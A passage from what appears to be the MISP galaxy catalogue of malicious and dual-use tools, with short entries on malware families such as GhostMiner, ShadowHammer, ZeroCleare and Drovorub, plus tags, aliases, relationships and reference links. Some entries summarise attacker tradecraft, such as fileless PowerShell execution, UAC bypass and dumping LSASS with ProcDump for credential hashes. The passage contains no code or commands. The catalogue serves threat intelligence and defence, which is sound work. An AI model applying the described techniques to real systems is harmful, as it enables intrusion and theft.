Table 16678. Table References

Links

https://github.com/misterch0c/shadowbroker

EVADEFRED

The tag is: misp-galaxy:tool="EVADEFRED"

Table 16679. Table References

Links

https://github.com/misterch0c/shadowbroker

NAMEDPIPETOUCH

Utility to test for a predefined list of named pipes, mostly AV detection. User can add checks for custom named pipes.

The tag is: misp-galaxy:tool="NAMEDPIPETOUCH"

Table 16680. Table References

Links

https://github.com/misterch0c/shadowbroker

GhostMiner

GhostMiner is a new cryptocurrency mining malware. By the end of March 2018, a new variant of mining malware was detected targeting MSSQL, phpMyAdmin, and Oracle WebLogic servers. The sample uses PowerShell to execute code with volatile resources and scans the server’s processes to detect and stop other miners that might have been running prior to execution. Fileless malware has become more popular in recent years: the malicious code runs directly in main memory without writing any file to disk, where an antivirus engine could detect it.

The tag is: misp-galaxy:tool="GhostMiner"

GhostMiner has relationships with:

  • similar: misp-galaxy:malpedia="GhostMiner" with estimative-language:likelihood-probability="almost-certain"

Table 16681. Table References

Links

https://www.alienvault.com/forums/discussion/17301/alienvault-labs-threat-intelligence-update-for-usm-anywhere-march-25-march-31-2018

August

August contains stealing functionality targeting credentials and sensitive documents from the infected computer.

The tag is: misp-galaxy:tool="August"

August is also known as:

  • August Stealer

Table 16682. Table References

Links

https://www.proofpoint.com/uk/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene

China Chopper

China Chopper is a publicly available, well-documented web shell, in widespread use since 2012.

The tag is: misp-galaxy:tool="China Chopper"

Table 16683. Table References

Links

https://www.ncsc.gov.uk/content/files/protected_files/article_files/Joint%20report%20on%20publicly%20available%20hacking%20tools%20%28NCSC%29.pdf

PNG Dropper

The PNG_dropper family primarily uses a modified version of the publicly available tool JPEGView.exe (version 1.0.32.1 – both x86 and x64 bit versions). Carbon Black Threat Research also observed where PNG_dropper malware was seen compiled into a modified version of the 7-Zip File Manager Utility (version 9.36.0.0 – x64 bit).

The tag is: misp-galaxy:tool="PNG Dropper"

PNG Dropper is also known as:

  • PNG_Dropper

  • PNGDropper

Table 16684. Table References

Links

https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/

https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/

Rotexy

A mobile spyware that turned into a banking trojan with ransomware capabilities managed to launch over 70,000 attacks in the course of just three months.

The tag is: misp-galaxy:tool="Rotexy"

Rotexy is also known as:

  • SMSThief

Table 16685. Table References

Links

https://www.bleepingcomputer.com/news/security/rotexy-mobile-trojan-launches-70k-attacks-in-three-months/

KingMiner

A recently discovered cryptomining operation forces access to Windows servers to use their CPU cycles for mining Monero coins. Detected six months ago, the activity went through multiple stages of evolution. Since it was spotted in mid-June, the malware received two updates and the number of attacks keeps increasing. The researchers at CheckPoint analyzed the new threat and gave it the name KingMiner. They found that it targets Microsoft IIS and SQL Servers in particular and runs a brute-force attack to gain access. Once in, the malware determines the CPU architecture and checks for older versions of itself to remove them.

The tag is: misp-galaxy:tool="KingMiner"

KingMiner has relationships with:

  • similar: misp-galaxy:malpedia="Kingminer" with estimative-language:likelihood-probability="almost-certain"

Table 16686. Table References

Links

https://www.bleepingcomputer.com/news/security/new-kingminer-threat-shows-cryptominer-evolution/

Taurus

Toolkit: a building kit for crafting documents used to deliver attacks.

The tag is: misp-galaxy:tool="Taurus"

Table 16687. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

SpicyOmelette

In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette.

The tag is: misp-galaxy:tool="SpicyOmelette"

Table 16689. Table References

Links

https://medium.com/@quoscient/golden-chickens-uncovering-a-malware-as-a-service-maas-provider-and-two-new-threat-actors-using-61cf0cb87648

https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish

LamePyre

When LamePyre runs on the system, users see the generic Automator icon in the menu bar, which is typical for any script of this sort. The script decodes a payload written in Python and runs it on the victim host. It then starts to take pictures and upload them to the attacker’s command and control (C2) server.

The tag is: misp-galaxy:tool="LamePyre"

LamePyre is also known as:

  • OSX.LamePyre

Table 16690. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lamepyre-macos-malware-sends-screenshots-to-attacker/

DarthMiner

The tag is: misp-galaxy:tool="DarthMiner"

DarthMiner has relationships with:

  • similar: misp-galaxy:malpedia="DarthMiner" with estimative-language:likelihood-probability="almost-certain"

Table 16691. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lamepyre-macos-malware-sends-screenshots-to-attacker/

OSX.BadWord

The tag is: misp-galaxy:tool="OSX.BadWord"

Table 16692. Table References

Links

https://www.bleepingcomputer.com/news/security/new-lamepyre-macos-malware-sends-screenshots-to-attacker/

OSX/Shlayer

The initial Trojan horse infection (the fake Flash Player installer) component of OSX/Shlayer leverages shell scripts to download additional malware or adware onto the infected system. The primary goal of OSX/Shlayer is to download and install adware onto an infected Mac. Although "adware" may not sound like a big deal, it can be a lot more harmful than the name implies; be sure to watch our aforementioned interview with Amit Serper to learn more about one particular example of malicious Mac adware. At least one variant of the malware also appears to exhibit an interesting behavior: It checks whether one of several Mac anti-virus products is installed.

The tag is: misp-galaxy:tool="OSX/Shlayer"

Table 16693. Table References

Links

https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/

ANEL

Backdoor

The tag is: misp-galaxy:tool="ANEL"

ANEL is also known as:

  • UPPERCUT

ANEL has relationships with:

  • similar: misp-galaxy:malpedia="Anel" with estimative-language:likelihood-probability="almost-certain"

Table 16695. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/

https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html

BabyShark

BabyShark is a relatively new malware. The earliest sample we found from open source repositories and our internal data sets was seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to a C2 server, maintains persistence on the system, and waits for further instruction from the operator.

The tag is: misp-galaxy:tool="BabyShark"

BabyShark has relationships with:

  • similar: misp-galaxy:malpedia="BabyShark" with estimative-language:likelihood-probability="almost-certain"

  • used-by: misp-galaxy:threat-actor="Kimsuky" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="BabyShark - S0414" with estimative-language:likelihood-probability="likely"

Table 16696. Table References

Links

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

StealthWorker

Hackers are running a new campaign which drops the StealthWorker brute-force malware on Windows and Linux machines that end up being used to brute-force other computers in a series of distributed brute-force attacks. As unearthed by FortiGuard Labs' Rommel Joven, the StealthWorker Golang-based brute forcer (also known as GoBrut) discovered by Malwarebytes at the end of February is actively being used to target and compromise multiple platforms. StealthWorker was previously connected to a number of compromised Magento-powered e-commerce websites on which attackers planted skimmers designed to exfiltrate both payment and personal information. As later discovered, the malware is capable of exploiting a number of vulnerabilities to infiltrate Magento, phpMyAdmin, and cPanel Content Management Systems (CMSs), as well as brute-forcing its way in if everything else fails.

The tag is: misp-galaxy:tool="StealthWorker"

Table 16697. Table References

Links

https://www.bleepingcomputer.com/news/security/stealthworker-malware-uses-windows-linux-bots-to-hack-websites/

SLUB Backdoor

The SLUB backdoor is a custom one written in the C++ programming language, statically linking the curl library to perform multiple HTTP requests. Other statically linked libraries are Boost (for extracting commands from gist snippets) and JsonCpp (for parsing Slack channel communication).

The tag is: misp-galaxy:tool="SLUB Backdoor"

SLUB Backdoor has relationships with:

  • similar: misp-galaxy:backdoor="SLUB" with estimative-language:likelihood-probability="likely"

Table 16698. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/new-slub-backdoor-uses-github-communicates-via-slack/

Carp Downloader

In 2017, Unit 42 reported on and analyzed a low-volume malware family called Cardinal RAT. This malware family had remained undetected for over two years and was delivered via a unique downloader named Carp Downloader.

The tag is: misp-galaxy:tool="Carp Downloader"

Table 16699. Table References

Links

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

EVILNUM

EVILNUM is a JavaScript-based malware family that is used in attacks against similar organizations.

The tag is: misp-galaxy:tool="EVILNUM"

EVILNUM has relationships with:

  • similar: misp-galaxy:rat="Cardinal" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Cardinal RAT" with estimative-language:likelihood-probability="likely"

Table 16700. Table References

Links

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

Brushaloader

Brushaloader also leverages a combination of VBScript and PowerShell to create a Remote Access Trojan (RAT) that allows persistent command execution on infected systems.

The tag is: misp-galaxy:tool="Brushaloader"

Brushaloader has relationships with:

  • similar: misp-galaxy:malpedia="BrushaLoader" with estimative-language:likelihood-probability="almost-certain"

Table 16701. Table References

Links

https://blog.talosintelligence.com/2019/02/combing-through-brushaloader.html

Karkoff

In addition to increased reports of threat activity, we have also discovered new evidence that the threat actors behind the DNSpionage campaign continue to change their tactics, likely in an attempt to improve the efficacy of their operations. In February, we discovered some changes to the actors' tactics, techniques and procedures (TTPs), including the use of a new reconnaissance phase that selectively chooses which targets to infect with malware. In April 2019, we also discovered the actors using a new malware, which we are calling Karkoff.

The tag is: misp-galaxy:tool="Karkoff"

Karkoff has relationships with:

  • similar: misp-galaxy:malpedia="Karkoff" with estimative-language:likelihood-probability="almost-certain"

Table 16702. Table References

Links

https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html

KimJongRAT

We conclude that this RAT/stealer is efficient and was also really interesting to analyse. Furthermore, the creator made efforts to look Korean, for example the author of the .pdf file is Kim Song Chol. He is the brother of Kim Jong-un, the leader of North Korea. We identified that the author of a variant of this stealer is another brother of Kim Jong-un. Maybe the author named every variant with the name of each brother. After some searches using Google, we identified an old variant of this malware here: http://contagiodump.blogspot.ca/2010/10/oct-08-cve-2010-2883-pdf-nuclear.html. The code of the malware available on the blog is close to our case but with fewer features. In 2010, the password of the Gmail account was futurekimkim. Three years ago, the author was already fixated on the Kim family… The language of the resource stored in the .dll file is Korean (LANG_KOREAN). The owner of the gmail mailbox is laoshi135.zhang and the secret question of this account is in Korean too. We don’t know if the malware truly comes from Korea. However, thanks to these factors, we decided to name this sample KimJongRAT/Stealer.

The tag is: misp-galaxy:tool="KimJongRAT"

KimJongRAT has relationships with:

  • similar: misp-galaxy:malpedia="KimJongRat" with estimative-language:likelihood-probability="almost-certain"

Table 16703. Table References

Links

https://malware.lu/assets/files/articles/RAP003_KimJongRAT-Stealer_Analysis.1.0.pdf

Cowboy

Based on our research, it appears the malware author calls the encoded secondary payload “Cowboy” regardless of what malware family is delivered.

The tag is: misp-galaxy:tool="Cowboy"

Table 16704. Table References

Links

https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/

JasperLoader

JasperLoader employs a multi-stage infection process that features several obfuscation techniques that make analysis more difficult. It appears that this loader was designed with resiliency and flexibility in mind, as evidenced in later stages of the infection process.

The tag is: misp-galaxy:tool="JasperLoader"

JasperLoader has relationships with:

  • similar: misp-galaxy:malpedia="JasperLoader" with estimative-language:likelihood-probability="almost-certain"

Table 16705. Table References

Links

https://blog.talosintelligence.com/2019/04/jasperloader-targets-italy.html?m=1

Scranos

The malware Scranos infects with rootkit capabilities, burying deep into vulnerable Windows computers to gain persistent access — even after the computer restarts. Scranos only emerged in recent months, according to Bitdefender with new research out Tuesday, but the number of its infections has rocketed in the months since it was first identified in November.

The tag is: misp-galaxy:tool="Scranos"

Scranos has relationships with:

  • similar: misp-galaxy:malpedia="Scranos" with estimative-language:likelihood-probability="almost-certain"

Table 16706. Table References

Links

https://labs.bitdefender.com/2019/04/inside-scranos-a-cross-platform-rootkit-enabled-spyware-operation/

https://techcrunch.com/2019/04/16/scranos-rootkit-passwords-payments/?guccounter=1&guce_referrer_us=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_cs=MrGSn18TmNoWovpLbekFYA

Reaver

Unit 42 has discovered a new malware family we’ve named “Reaver” with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010. The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.

The tag is: misp-galaxy:tool="Reaver"

Reaver has relationships with:

  • similar: misp-galaxy:tool="SunOrcal" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:tool="SURTR" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:malpedia="Reaver" with estimative-language:likelihood-probability="almost-certain"

Table 16707. Table References

Links

https://unit42.paloaltonetworks.com/unit42-new-malware-with-ties-to-sunorcal-discovered/

https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html

SURTR

The Citizen Lab analyzed a malicious email sent to Tibetan organizations in June 2013. The email in question purported to be from a prominent member of the Tibetan community and repurposed content from a community mailing list. Attached to the email were what appeared to be three Microsoft Word documents (.doc), but which were trojaned with a malware family we call “Surtr”. All three attachments drop the exact same malware. We have seen the Surtr malware family used in attacks on Tibetan groups dating back to November 2012.

The tag is: misp-galaxy:tool="SURTR"

SURTR has relationships with:

  • similar: misp-galaxy:tool="Reaver" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:tool="SunOrcal" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:malpedia="surtr" with estimative-language:likelihood-probability="almost-certain"

Table 16708. Table References

Links

https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/

https://otx.alienvault.com/pulse/588a7c8fe4166d1d84244b9a

SunOrcal

SunOrcal is a trojan malware family whose activity dates back to at least 2013. A version discovered in November 2017 incorporates steganography techniques and can collect C2 information via GitHub, obscuring its C2 infrastructure and evading detection using the legitimate site for its first beacon. The threat actors have targeted users in the Vietnam area, spreading phishing emails containing malicious documents purportedly regarding South China Sea disputes. The new SunOrcal version has also been used with the recently discovered Reaver trojan and the original SunOrcal version. Some of the recent activity also incorporates the use of the Surtr malware.

The tag is: misp-galaxy:tool="SunOrcal"

SunOrcal has relationships with:

  • similar: misp-galaxy:tool="Reaver" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:tool="SURTR" with estimative-language:likelihood-probability="roughly-even-chance"

  • similar: misp-galaxy:malpedia="SunOrcal" with estimative-language:likelihood-probability="almost-certain"

Table 16709. Table References

Links

https://unit42.paloaltonetworks.com/unit42-sunorcal-adds-github-steganography-repertoire-expands-vietnam-myanmar/

https://www.cyber.nj.gov/threat-profiles/trojan-variants/sunorcal

Bookworm

Threat actors have delivered Bookworm as a payload in attacks on targets in Thailand. Readers who are interested in this campaign should start with our first blog that lays out the overall functionality of the malware and introduces its many components. Unit 42 does not have detailed targeting information for all known Bookworm samples, but we are aware of attempted attacks on at least two branches of government in Thailand. We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoy documents, as well as several of the dynamic DNS domain names used to host C2 servers that contain the words “Thai” or “Thailand”. Analysis of compromised systems seen communicating with Bookworm C2 servers also confirms our speculation on targeting, with a majority of systems existing within Thailand.

The tag is: misp-galaxy:tool="Bookworm"

Bookworm has relationships with:

  • similar: misp-galaxy:malpedia="Bookworm" with estimative-language:likelihood-probability="almost-certain"

Table 16710. Table References

Links

https://unit42.paloaltonetworks.com/attack-campaign-on-the-government-of-thailand-delivers-bookworm-trojan/

https://unit42.paloaltonetworks.com/bookworm-trojan-a-model-of-modular-architecture/

Amavaldo

We named the malware family described in the rest of this blog post Amavaldo. This family is still in active development – the latest version we have observed (10.7) has a compilation timestamp of June 10th, 2019.

The tag is: misp-galaxy:tool="Amavaldo"

Table 16711. Table References

Links

https://www.welivesecurity.com/2019/08/01/banking-trojans-amavaldo/

TVSPY

hacker going by the handle Mr. Burns. He also created something similar called RMS, which behaves very much like the TVSPY builder. “RMS/TVSPY continues to be developed, with a new version being posted by the developer/reseller on a regular basis,” Damballa researchers noted. “In fact, the legitimate RMS version developed by TektonIT and the version posted in criminal forums appear to be identical. TVSPY seems to be merely a modification of RMS to utilize TeamViewer infrastructure and a command-and-control interface manageable through the Web.”

The tag is: misp-galaxy:tool="TVSPY"

TVSPY is also known as:

  • TVRAT

  • SpY-Agent

  • teamspy

Table 16712. Table References

Links

https://mobile.twitter.com/SaudiDFIR/status/1177740045186457600

COMpfun

The COMpfun malware was initially documented by G-DATA in 2014. Although G-DATA didn’t identify which actor was using this malware, Kaspersky tentatively linked it to the Turla APT, based on the victimology. Our telemetry indicates that the current campaign using Reductor started at the end of April 2019 and remained active at the time of writing (August 2019). We identified targets in Russia and Belarus.

The tag is: misp-galaxy:tool="COMpfun"

COMpfun has relationships with:

  • similar: misp-galaxy:malpedia="COMpfun" with estimative-language:likelihood-probability="almost-certain"

Table 16713. Table References

Links

https://securelist.com/compfun-successor-reductor/93633/

https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence

Reductor

We called these new modules ‘Reductor’ after a .pdb path left in some samples. Besides typical RAT functions such as uploading, downloading and executing files, Reductor’s authors put a lot of effort into manipulating digital certificates and marking outbound TLS traffic with unique host-related identifiers. The Kaspersky Attribution Engine shows strong code similarities between this family and the COMPfun Trojan. Moreover, further research showed that the original COMpfun Trojan most probably is used as a downloader in one of the distribution schemes. Based on these similarities, we’re quite sure the new malware was developed by the COMPfun authors.

The tag is: misp-galaxy:tool="Reductor"

Table 16714. Table References

Links

https://securelist.com/compfun-successor-reductor/93633/

ProcDump

Legitimate tool - command-line tool used to monitor a running process and dump its memory depending on custom criteria. The attackers use this tool to dump the LSASS process to gather Windows credential hashes.

The tag is: misp-galaxy:tool="ProcDump"

CertMig

Legitimate tool - command-line tool used to import and export certificates on a machine. The attackers use this tool to gather credentials used for VPN authentication to the clients’ networks.

The tag is: misp-galaxy:tool="CertMig"

Netscan

Legitimate tool - tool used to scan IPv4/IPv6 networks and remotely execute PowerShell commands.

The tag is: misp-galaxy:tool="Netscan"

ShadowHammer

Malware embedded in Asus Live Update in 2018. ShadowHammer triggers its malicious behavior only if the computer it is running on has a network adapter with the MAC address whitelisted by the attacker.

The tag is: misp-galaxy:tool="ShadowHammer"

ShadowHammer has relationships with:

  • similar: misp-galaxy:malpedia="shadowhammer" with estimative-language:likelihood-probability="almost-certain"

Table 16715. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Winnti.pdf

DePriMon

DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, we consider it to be a framework.

The tag is: misp-galaxy:tool="DePriMon"

DePriMon has relationships with:

  • similar: misp-galaxy:malpedia="Deprimon" with estimative-language:likelihood-probability="almost-certain"

Table 16716. Table References

Links

https://www.bleepingcomputer.com/news/security/deprimon-malware-registers-itself-as-a-windows-print-monitor/

https://www.welivesecurity.com/2019/11/21/deprimon-default-print-monitor-malicious-downloader/

Private Internet Access

Private Internet Access provides state of the art, multi-layered security with advanced privacy protection using VPN tunneling.

The tag is: misp-galaxy:tool="Private Internet Access"

Private Internet Access is also known as:

  • PIA

Table 16717. Table References

Links

https://www.privateinternetaccess.com/

Netcat

Reads from and writes to network connections using TCP or UDP protocols.

The tag is: misp-galaxy:tool="Netcat"

NBTScan

NBTScan is a program for scanning IP networks for NetBIOS name information (similar to what the Windows nbtstat tool provides against single hosts). It sends a NetBIOS status query to each address in a supplied range and lists received information in human-readable form. For each responding host it lists IP address, NetBIOS computer name, logged-in user name and MAC address.

The tag is: misp-galaxy:tool="NBTScan"

Table 16718. Table References

Links

https://sectools.org/tool/nbtscan/

PowerGhost

PowerGhost is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers. This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation. The creators of PowerGhost, however, went further and started using fileless techniques to establish the illegal miner within the victim system.

The tag is: misp-galaxy:tool="PowerGhost"

Table 16719. Table References

Links

https://securelist.com/a-mining-multitool/86950/

VBEtaly

Check Point researchers have found another wave of the Ursnif malspam campaign targeting Italy. Only a few details are known so far but what we have found is that the file delivered is a VBE file (encoded VBS) named “SCANSIONE.vbe” and is delivered via ZIP attachments in emails with the subject suggesting different documents in Italian.

The tag is: misp-galaxy:tool="VBEtaly"

Table 16720. Table References

Links

https://research.checkpoint.com/vbetaly/

ZeroCleare

ZeroCleare was used to execute a destructive attack that affected organizations in the energy and industrial sectors in the Middle East. Based on the analysis of the malware and the attackers’ behavior, we suspect Iran-based nation state adversaries were involved in developing and deploying this new wiper.

The tag is: misp-galaxy:tool="ZeroCleare"

ZeroCleare has relationships with:

  • similar: misp-galaxy:malpedia="ZeroCleare" with estimative-language:likelihood-probability="almost-certain"

Table 16721. Table References

Links

https://www.ibm.com/downloads/cas/OAJ4VZNJ

Dustman

At the heart of the recent Bapco attack is a new strain of malware named Dustman. According to an analysis by Saudi Arabia’s cyber-security agency, Dustman is a so-called data wiper — malware designed to delete data on infected computers, once launched into execution. Dustman represents the third different data-wiping malware linked to the Tehran regime. Iranian state-backed hackers have a long history of developing data-wiping malware.

The tag is: misp-galaxy:tool="Dustman"

Dustman has relationships with:

  • similar: misp-galaxy:malpedia="DUSTMAN" with estimative-language:likelihood-probability="almost-certain"

Table 16722. Table References

Links

https://mobile.twitter.com/IntezerLabs/status/1215252764080644098

Autochk Rootkit

This rootkit is very simple. The name of the driver is “autochk.sys” - that’s why we’ll call it the autochk rootkit. The rootkit implements 2 functionalities: File Redirection and Network Connection Hiding.

The tag is: misp-galaxy:tool="Autochk Rootkit"

Table 16723. Table References

Links

https://repnz.github.io/posts/autochk-rootkit-analysis/

Lampion

A new trojan called Lampion has spread using template emails from the Portuguese Government Finance & Tax during the last days of 2019.

The tag is: misp-galaxy:tool="Lampion"

Lampion has relationships with:

  • similar: misp-galaxy:malpedia="lampion" with estimative-language:likelihood-probability="almost-certain"

Table 16724. Table References

Links

https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/

LiquorBot

Bitdefender researchers tracked the development of a Mirai-inspired botnet, dubbed LiquorBot, which seems to be actively in development and has recently incorporated Monero cryptocurrency mining features.

The tag is: misp-galaxy:tool="LiquorBot"

LiquorBot has relationships with:

  • similar: misp-galaxy:malpedia="LiquorBot" with estimative-language:likelihood-probability="almost-certain"

Table 16725. Table References

Links

https://labs.bitdefender.com/2020/01/hold-my-beer-mirai-spinoff-named-liquorbot-incorporates-cryptomining/

Gelup malware tool

Written in C++ and designed to function as a downloader of other malware, Gelup stood out for its obfuscation techniques. Gelup can also bypass User Account Control (UAC) by mocking trusted directories, abusing auto-elevated executables and using the Dynamic Link Library (DLL) side-loading technique.

The tag is: misp-galaxy:tool="Gelup malware tool"

Gelup malware tool is also known as:

  • AndroMut

Table 16726. Table References

Links

https://securityintelligence.com/news/ta505-delivers-new-gelup-malware-tool-flowerpippi-backdoor-via-spam-campaign/

DenesRAT

DenesRAT is a private Trojan horse of the "Sea Lotus" organization, which can perform corresponding functions according to the instructions issued by the C2 server. The main functions are file operations, such as creating files or directories, deleting files or directories, finding files; registry reading and writing; remote code execution, such as creating processes, executing DLLs, etc.

The tag is: misp-galaxy:tool="DenesRAT"

DenesRAT is also known as:

  • METALJACK

Table 16727. Table References

Links

http://baijiahao.baidu.com/s?id=1661498030941117519

https://www.fireeye.com/blog/threat-research/2020/04/apt32-targeting-chinese-government-in-covid-19-related-espionage.html

Covenant

Covenant is a .NET command and control framework that aims to highlight the attack surface of .NET, make the use of offensive .NET tradecraft easier, and serve as a collaborative command and control platform for red teamers.

The tag is: misp-galaxy:tool="Covenant"

Table 16729. Table References

Links

https://github.com/cobbr/Covenant/

Cobalt Strike

Cobalt Strike is a post-exploitation framework.

The tag is: misp-galaxy:tool="Cobalt Strike"

Cobalt Strike has relationships with:

  • similar: misp-galaxy:malpedia="Cobalt Strike" with estimative-language:likelihood-probability="almost-certain"

Table 16730. Table References

Links

https://www.cobaltstrike.com

metasploit

METASPLOIT is a penetration testing framework whose features include vulnerability testing, network enumeration, payload generation and execution, and defense evasion. Availability: Public

The tag is: misp-galaxy:tool="metasploit"

Table 16731. Table References

Links

https://www.metasploit.com

https://mandiant.widen.net/s/zvmfw5fnjs/apt43-report

CrackMapExec

A swiss army knife for pentesting networks. CRACKMAPEXEC is a post-exploitation tool against Microsoft Windows environments. It is recognized for its lateral movement capabilities.

The tag is: misp-galaxy:tool="CrackMapExec"

Table 16732. Table References

Links

https://github.com/byt3bl33d3r/CrackMapExec

https://bitdefender.com/files/News/CaseStudies/study/332/Bitdefender-Whitepaper-Chafer-creat4491-en-EN-interactive.pdf

https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation

WellMess

WellMess is a Remote Access Trojan written in Golang; a .NET version also exists.

The tag is: misp-galaxy:tool="WellMess"

WellMess has relationships with:

  • similar: misp-galaxy:malpedia="WellMess" with estimative-language:likelihood-probability="almost-certain"

Table 16733. Table References

Links

https://www.lac.co.jp/lacwatch/pdf/20180614_cecreport_vol3.pdf

https://blogs.jpcert.or.jp/en/2018/07/malware-wellmes-9b78.html

https://www.botconf.eu/wp-content/uploads/2018/12/2018-Y-Ishikawa-S-Nagano-Lets-go-with-a-Go-RAT-_final.pdf

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

WellMail

WellMail is a lightweight tool designed to run commands or scripts with the results being sent to a hardcoded Command and Control (C2) server.

The tag is: misp-galaxy:tool="WellMail"

WellMail has relationships with:

  • similar: misp-galaxy:malpedia="WellMail" with estimative-language:likelihood-probability="almost-certain"

Table 16734. Table References

Links

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

Drovorub

Drovorub is a Linux malware toolset consisting of an implant coupled with a kernel module rootkit, a file transfer and port forwarding tool, and a Command and Control (C2) server.

The tag is: misp-galaxy:tool="Drovorub"

Table 16735. Table References

Links

https://media.defense.gov/2020/Aug/13/2002476465/-1/-1/0/CSA_DROVORUB_RUSSIAN_GRU_MALWARE_AUG_2020.PDF

IsErIk

The adware DealPly (sometimes also referred to as IsErIk) and the malicious Chrome extension ManageX, for instance, can come bundled under the guise of a legitimate installer and other potentially unwanted applications (PUAs). Because various write-ups cover DealPly and IsErIk separately, the technical discussion and representation of the two are kept separate.

The tag is: misp-galaxy:tool="IsErIk"

IsErIk is also known as:

  • DealPly

  • ManageX

Table 16736. Table References

Links

https://blog.trendmicro.com/trendlabs-security-intelligence/exposing-modular-adware-how-dealply-iserik-and-managex-persist-in-systems/

Vatet

Attackers often shift infrastructure, techniques, and tools to avoid notoriety that might attract law enforcement or security researchers. They often retain them while waiting for security organizations to start considering associated artifacts inactive, so they face less scrutiny. Vatet, a custom loader for the Cobalt Strike framework that has been seen in ransomware campaigns as early as November 2018, is one of the tools that has resurfaced in the recent campaigns.

The tag is: misp-galaxy:tool="Vatet"

Table 16737. Table References

Links

https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/

https://www.tripwire.com/state-of-security/featured/ransomware-characteristics-attack-chains-recent-campaigns/

ConfuserEx

ConfuserEx is a common .NET packer/protector used to obfuscate .NET assemblies and confuse the decompilation process. According to the official site: ConfuserEx is a free, open-source protector for .NET applications. It is the successor of the Confuser project. ConfuserEx supports .NET Framework from 2.0 - 4.5 and Mono (and other .NET platforms if enough request!). It supports most of the protections you’ll find in commercial protectors, and some more!

The tag is: misp-galaxy:tool="ConfuserEx"

Table 16738. Table References

Links

https://yck1509.github.io/ConfuserEx/

https://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html

Beds Protector

Beds Protector is a common .NET packer/protector. It is a mod of ConfuserEx, which is another common .NET packer/protector. It is commonly used to obfuscate .NET assemblies and confuse the decompilation process. The latest available version is Beds Protector v1.4.1.

The tag is: misp-galaxy:tool="Beds Protector"

Table 16739. Table References

Links

https://github.com/BedTheGod/ConfuserEx-Mod-By-Bed

HyperBro

The HyperBro Trojan was used as a last-stage in-memory remote administration tool (RAT).

The tag is: misp-galaxy:tool="HyperBro"

HyperBro has relationships with:

  • similar: misp-galaxy:malpedia="HyperBro" with estimative-language:likelihood-probability="almost-certain"

Table 16740. Table References

Links

https://securelist.com/luckymouse-hits-national-data-center/86083/

SUNSPOT

SUNSPOT is StellarParticle’s malware used to insert the SUNBURST backdoor into software builds of the SolarWinds Orion IT management product.

The tag is: misp-galaxy:tool="SUNSPOT"

SUNSPOT has relationships with:

  • dropped: misp-galaxy:backdoor="SUNBURST" with estimative-language:likelihood-probability="likely"

Table 16741. Table References

Links

